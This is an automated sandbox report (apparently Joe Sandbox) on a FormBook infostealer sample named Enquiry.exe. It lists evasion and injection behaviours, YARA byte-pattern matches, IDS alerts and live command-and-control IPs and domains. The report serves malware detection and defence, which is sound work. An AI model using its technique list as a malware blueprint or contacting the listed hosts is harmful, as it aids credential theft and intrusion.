Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Enquiry.exe

Overview

General Information

Sample name:Enquiry.exe
Analysis ID:1515808
MD5:c317103ec0a74f2c480a9f859102b530
SHA1:2630d8e2081974601b5424dd1a6b596ab692fb04
SHA256:dc32f136f8ce43634b3ccb423347bd015ce2371cfd65af25d28b61e489aa7aa9
Tags:exeuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Enquiry.exe (PID: 7048 cmdline: "C:\Users\user\Desktop\Enquiry.exe" MD5: C317103EC0A74F2C480A9F859102B530)
    • svchost.exe (PID: 6368 cmdline: "C:\Users\user\Desktop\Enquiry.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • lOHjHqJCgqObv.exe (PID: 2140 cmdline: "C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • RmClient.exe (PID: 6372 cmdline: "C:\Windows\SysWOW64\RmClient.exe" MD5: CE765DCC7CDFDC1BFD94CCB772C75E41)
          • lOHjHqJCgqObv.exe (PID: 2412 cmdline: "C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 2676 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000006.00000002.3532848428.0000000002F30000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000006.00000002.3532848428.0000000002F30000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2bd80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13eaf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000001.00000002.1991008499.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000001.00000002.1991008499.0000000000400000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2f133:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x17262:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000006.00000002.3534273215.0000000003660000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries
        SourceRuleDescriptionAuthorStrings
        1.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          1.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e333:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16462:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          1.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            1.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2f133:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17262:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Enquiry.exe", CommandLine: "C:\Users\user\Desktop\Enquiry.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Enquiry.exe", ParentImage: C:\Users\user\Desktop\Enquiry.exe, ParentProcessId: 7048, ParentProcessName: Enquiry.exe, ProcessCommandLine: "C:\Users\user\Desktop\Enquiry.exe", ProcessId: 6368, ProcessName: svchost.exe
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\Enquiry.exe", CommandLine: "C:\Users\user\Desktop\Enquiry.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Enquiry.exe", ParentImage: C:\Users\user\Desktop\Enquiry.exe, ParentProcessId: 7048, ParentProcessName: Enquiry.exe, ProcessCommandLine: "C:\Users\user\Desktop\Enquiry.exe", ProcessId: 6368, ProcessName: svchost.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-23T14:54:13.280749+020020507451Malware Command and Control Activity Detected192.168.2.44973644.213.25.7080TCP
            2024-09-23T14:54:37.421281+020020507451Malware Command and Control Activity Detected192.168.2.449741206.119.82.13480TCP
            2024-09-23T14:54:50.714546+020020507451Malware Command and Control Activity Detected192.168.2.44974667.223.117.18980TCP
            2024-09-23T14:55:04.005541+020020507451Malware Command and Control Activity Detected192.168.2.449750199.59.243.22780TCP
            2024-09-23T14:55:17.215770+020020507451Malware Command and Control Activity Detected192.168.2.4497543.33.130.19080TCP
            2024-09-23T14:55:31.624440+020020507451Malware Command and Control Activity Detected192.168.2.449758183.181.83.13180TCP
            2024-09-23T14:55:45.467837+020020507451Malware Command and Control Activity Detected192.168.2.44976238.47.232.19680TCP
            2024-09-23T14:55:58.639205+020020507451Malware Command and Control Activity Detected192.168.2.4497663.33.130.19080TCP
            2024-09-23T14:56:12.638591+020020507451Malware Command and Control Activity Detected192.168.2.449770154.212.219.280TCP
            2024-09-23T14:56:27.500321+020020507451Malware Command and Control Activity Detected192.168.2.449774133.130.35.9080TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-23T14:54:13.280749+020028554651A Network Trojan was detected192.168.2.44973644.213.25.7080TCP
            2024-09-23T14:54:37.421281+020028554651A Network Trojan was detected192.168.2.449741206.119.82.13480TCP
            2024-09-23T14:54:50.714546+020028554651A Network Trojan was detected192.168.2.44974667.223.117.18980TCP
            2024-09-23T14:55:04.005541+020028554651A Network Trojan was detected192.168.2.449750199.59.243.22780TCP
            2024-09-23T14:55:17.215770+020028554651A Network Trojan was detected192.168.2.4497543.33.130.19080TCP
            2024-09-23T14:55:31.624440+020028554651A Network Trojan was detected192.168.2.449758183.181.83.13180TCP
            2024-09-23T14:55:45.467837+020028554651A Network Trojan was detected192.168.2.44976238.47.232.19680TCP
            2024-09-23T14:55:58.639205+020028554651A Network Trojan was detected192.168.2.4497663.33.130.19080TCP
            2024-09-23T14:56:12.638591+020028554651A Network Trojan was detected192.168.2.449770154.212.219.280TCP
            2024-09-23T14:56:27.500321+020028554651A Network Trojan was detected192.168.2.449774133.130.35.9080TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-23T14:54:29.679685+020028554641A Network Trojan was detected192.168.2.449738206.119.82.13480TCP
            2024-09-23T14:54:32.420697+020028554641A Network Trojan was detected192.168.2.449739206.119.82.13480TCP
            2024-09-23T14:54:34.873915+020028554641A Network Trojan was detected192.168.2.449740206.119.82.13480TCP
            2024-09-23T14:54:43.064276+020028554641A Network Trojan was detected192.168.2.44974267.223.117.18980TCP
            2024-09-23T14:54:45.623820+020028554641A Network Trojan was detected192.168.2.44974367.223.117.18980TCP
            2024-09-23T14:54:48.268284+020028554641A Network Trojan was detected192.168.2.44974567.223.117.18980TCP
            2024-09-23T14:54:56.376411+020028554641A Network Trojan was detected192.168.2.449747199.59.243.22780TCP
            2024-09-23T14:54:58.902403+020028554641A Network Trojan was detected192.168.2.449748199.59.243.22780TCP
            2024-09-23T14:55:01.457388+020028554641A Network Trojan was detected192.168.2.449749199.59.243.22780TCP
            2024-09-23T14:55:10.561536+020028554641A Network Trojan was detected192.168.2.4497513.33.130.19080TCP
            2024-09-23T14:55:12.054749+020028554641A Network Trojan was detected192.168.2.4497523.33.130.19080TCP
            2024-09-23T14:55:14.667791+020028554641A Network Trojan was detected192.168.2.4497533.33.130.19080TCP
            2024-09-23T14:55:24.056704+020028554641A Network Trojan was detected192.168.2.449755183.181.83.13180TCP
            2024-09-23T14:55:26.580468+020028554641A Network Trojan was detected192.168.2.449756183.181.83.13180TCP
            2024-09-23T14:55:29.303524+020028554641A Network Trojan was detected192.168.2.449757183.181.83.13180TCP
            2024-09-23T14:55:37.783709+020028554641A Network Trojan was detected192.168.2.44975938.47.232.19680TCP
            2024-09-23T14:55:40.297602+020028554641A Network Trojan was detected192.168.2.44976038.47.232.19680TCP
            2024-09-23T14:55:42.936675+020028554641A Network Trojan was detected192.168.2.44976138.47.232.19680TCP
            2024-09-23T14:55:50.984622+020028554641A Network Trojan was detected192.168.2.4497633.33.130.19080TCP
            2024-09-23T14:55:54.458853+020028554641A Network Trojan was detected192.168.2.4497643.33.130.19080TCP
            2024-09-23T14:55:56.091683+020028554641A Network Trojan was detected192.168.2.4497653.33.130.19080TCP
            2024-09-23T14:56:05.209183+020028554641A Network Trojan was detected192.168.2.449767154.212.219.280TCP
            2024-09-23T14:56:07.556609+020028554641A Network Trojan was detected192.168.2.449768154.212.219.280TCP
            2024-09-23T14:56:10.189077+020028554641A Network Trojan was detected192.168.2.449769154.212.219.280TCP
            2024-09-23T14:56:19.785777+020028554641A Network Trojan was detected192.168.2.449771133.130.35.9080TCP
            2024-09-23T14:56:22.341966+020028554641A Network Trojan was detected192.168.2.449772133.130.35.9080TCP
            2024-09-23T14:56:24.915587+020028554641A Network Trojan was detected192.168.2.449773133.130.35.9080TCP
            2024-09-23T14:56:33.252344+020028554641A Network Trojan was detected192.168.2.4497753.33.130.19080TCP
            2024-09-23T14:56:36.212264+020028554641A Network Trojan was detected192.168.2.4497763.33.130.19080TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: Enquiry.exeReversingLabs: Detection: 63%
            Source: Enquiry.exeVirustotal: Detection: 67%Perma Link
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.3532848428.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1991008499.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3534273215.0000000003660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2000492218.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1997146655.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3533106895.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3536218795.0000000005770000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3534236092.0000000002FE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: Enquiry.exeJoe Sandbox ML: detected
            Source: Enquiry.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: RmClient.pdbGCTL source: svchost.exe, 00000001.00000002.1996829144.0000000000800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1996930488.000000000081A000.00000004.00000020.00020000.00000000.sdmp, lOHjHqJCgqObv.exe, 00000003.00000002.3533614188.000000000128E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: lOHjHqJCgqObv.exe, 00000003.00000000.1858505169.000000000024E000.00000002.00000001.01000000.00000005.sdmp, lOHjHqJCgqObv.exe, 00000007.00000002.3532849738.000000000024E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: Enquiry.exe, 00000000.00000003.1724018113.0000000004680000.00000004.00001000.00020000.00000000.sdmp, Enquiry.exe, 00000000.00000003.1724629385.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1837790839.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1997322740.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1997322740.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1835138164.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000006.00000002.3534474954.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp, RmClient.exe, 00000006.00000003.1995317971.0000000003713000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000006.00000002.3534474954.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, RmClient.exe, 00000006.00000003.1990157845.0000000003561000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Enquiry.exe, 00000000.00000003.1724018113.0000000004680000.00000004.00001000.00020000.00000000.sdmp, Enquiry.exe, 00000000.00000003.1724629385.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1837790839.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1997322740.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1997322740.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1835138164.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, RmClient.exe, 00000006.00000002.3534474954.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp, RmClient.exe, 00000006.00000003.1995317971.0000000003713000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000006.00000002.3534474954.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, RmClient.exe, 00000006.00000003.1990157845.0000000003561000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: RmClient.exe, 00000006.00000002.3533246555.000000000346D000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000006.00000002.3535415896.0000000003EEC000.00000004.10000000.00040000.00000000.sdmp, lOHjHqJCgqObv.exe, 00000007.00000000.2063894014.000000000333C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2304214880.000000003A9FC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: RmClient.exe, 00000006.00000002.3533246555.000000000346D000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000006.00000002.3535415896.0000000003EEC000.00000004.10000000.00040000.00000000.sdmp, lOHjHqJCgqObv.exe, 00000007.00000000.2063894014.000000000333C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2304214880.000000003A9FC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: RmClient.pdb source: svchost.exe, 00000001.00000002.1996829144.0000000000800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1996930488.000000000081A000.00000004.00000020.00020000.00000000.sdmp, lOHjHqJCgqObv.exe, 00000003.00000002.3533614188.000000000128E000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02F4C280 FindFirstFileW,FindNextFileW,FindClose,6_2_02F4C280
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 4x nop then xor eax, eax6_2_02F39A00
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 4x nop then mov ebx, 00000004h6_2_037504E1

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49750 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49742 -> 67.223.117.189:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49750 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49768 -> 154.212.219.2:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49739 -> 206.119.82.134:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49738 -> 206.119.82.134:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49753 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49752 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49746 -> 67.223.117.189:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49775 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49746 -> 67.223.117.189:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49748 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49763 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49754 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49771 -> 133.130.35.90:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49741 -> 206.119.82.134:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49741 -> 206.119.82.134:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49754 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49761 -> 38.47.232.196:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49772 -> 133.130.35.90:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49756 -> 183.181.83.131:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49743 -> 67.223.117.189:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49751 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49740 -> 206.119.82.134:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49776 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49755 -> 183.181.83.131:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49745 -> 67.223.117.189:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49766 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49749 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49757 -> 183.181.83.131:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49766 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49764 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49760 -> 38.47.232.196:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49767 -> 154.212.219.2:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49769 -> 154.212.219.2:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49765 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49759 -> 38.47.232.196:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49758 -> 183.181.83.131:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49758 -> 183.181.83.131:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49762 -> 38.47.232.196:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49762 -> 38.47.232.196:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49736 -> 44.213.25.70:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49736 -> 44.213.25.70:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49770 -> 154.212.219.2:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49770 -> 154.212.219.2:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49773 -> 133.130.35.90:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49747 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49774 -> 133.130.35.90:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49774 -> 133.130.35.90:80
            Source: DNS query: www.uburn.xyz
            Source: DNS query: www.nakama2-sshl.xyz
            Source: Joe Sandbox ViewIP Address: 67.223.117.189 67.223.117.189
            Source: Joe Sandbox ViewASN Name: VIMRO-AS15189US VIMRO-AS15189US
            Source: Joe Sandbox ViewASN Name: COMING-ASABCDEGROUPCOMPANYLIMITEDHK COMING-ASABCDEGROUPCOMPANYLIMITEDHK
            Source: Joe Sandbox ViewASN Name: AMAZON-AESUS AMAZON-AESUS
            Source: Joe Sandbox ViewASN Name: INTERQGMOInternetIncJP INTERQGMOInternetIncJP
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
